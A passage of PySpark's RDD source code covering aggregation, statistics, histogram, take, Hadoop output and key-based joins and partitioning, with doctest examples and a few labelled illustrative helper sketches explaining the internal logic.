:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
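# Illustrative sketch (not part of PySpark): the partition-count schedule produced
# by the while-loop above. The helper is hypothetical; with 100 partitions and
# depth=2 the scale is ceil(100 ** 0.5) = 10, so a single intermediate level of 10
# partitions is built before the final reduce, and the loop stops as soon as an
# extra level would no longer shrink the work.
def _tree_levels(num_partitions, depth):
    from math import ceil, pow  # repeated locally so the sketch stands alone
    scale = max(int(ceil(pow(num_partitions, 1.0 / depth))), 2)
    levels = []
    n = num_partitions
    while n > scale + n / scale:
        n /= scale
        levels.append(int(n))
    return levels
# _tree_levels(100, 2) -> [10]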
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate the key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate the key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last, which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. On the input of 1
and 50 we would have a histogram of 1,0,1.
If your buckets are evenly spaced (e.g. [0, 10, 20, 30]),
the lookup can be switched from an O(log n) insertion to O(1) per
element (where n = # buckets).
Buckets must be sorted, must not contain any duplicates, and must
have at least two elements.
If `buckets` is a number, it generates buckets that are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1. An exception is raised if the RDD contains infinity
or NaN. If the elements in the RDD do not vary (max == min), a
single bucket is always returned.
It returns a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
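# Illustrative sketch (not part of PySpark): the two bucket-index strategies used
# by histogram() above. The helper is hypothetical and skips the out-of-range
# filtering the real code does. For evenly spaced buckets the index is plain
# arithmetic (O(1) per element); otherwise bisect_right is used, and the closed
# right edge of the last bucket is folded into the bucket before it, mirroring
# the "add last two together" step.
def _bucket_index(value, buckets, even):
    import bisect  # repeated locally so the sketch stands alone
    minv, maxv = buckets[0], buckets[-1]
    if even:
        inc = (maxv - minv) / float(len(buckets) - 1)
        idx = int((value - minv) / inc)
    else:
        idx = bisect.bisect_right(buckets, value) - 1
    return min(idx, len(buckets) - 2)
# _bucket_index(50, [0, 25, 50], True) -> 1, matching rdd.histogram(2) above.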
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and then using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
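# Illustrative sketch (not part of PySpark): the partition-count estimator used by
# take() above, isolated with made-up numbers. After scanning 2 partitions and
# finding 1 of the 10 wanted items, it interpolates int(1.5 * 10 * 2 / 1) - 2 = 28
# and then caps that at 2 * 4 = 8 partitions for the next round.
def _next_parts_to_try(num, items_found, parts_scanned):
    if parts_scanned == 0:
        return 1
    if items_found == 0:
        return parts_scanned * 4  # nothing found yet: quadruple and retry
    estimate = int(1.5 * num * parts_scanned / items_found) - parts_scanned
    return min(max(estimate, 1), parts_scanned * 4)
# _next_parts_to_try(10, 1, 2) -> 8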
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# To avoid overly large objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
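# Illustrative sketch (not part of PySpark): the adaptive flush-size rule from
# add_shuffle_key above, isolated. The helper is hypothetical: given the average
# serialized chunk size in MB, the batch grows while chunks stay under 1MB and
# shrinks once they pass 10MB, keeping shuffle blocks inside the 1-10MB band the
# inline comment asks for.
def _tune_batch(batch, avg_chunk_mb):
    if avg_chunk_mb < 1:
        return batch * 1.5
    if avg_chunk_mb > 10:
        return max(int(batch / 1.5), 1)
    return batch
# _tune_batch(1000, 0.2) -> 1500.0 ; _tune_batch(1000, 12) -> 666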
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
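# Illustrative sketch (not part of PySpark): the createCombiner/mergeValue/
# mergeCombiners contract from the docstring, played out on plain dicts. The
# helper names are hypothetical; _combine_locally is the per-partition pass and
# _merge_combiners is the post-shuffle pass. With str/add/add from the doctest
# above, two "partitions" [("a", 1), ("b", 1)] and [("a", 1)] again produce
# {'a': '11', 'b': '1'}.
def _combine_locally(pairs, create_combiner, merge_value):
    out = {}
    for k, v in pairs:
        out[k] = merge_value(out[k], v) if k in out else create_combiner(v)
    return out
def _merge_combiners(maps, merge_combiners):
    out = {}
    for m in maps:
        for k, c in m.items():
            out[k] = merge_combiners(out[k], c) if k in out else c
    return out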
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using the given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
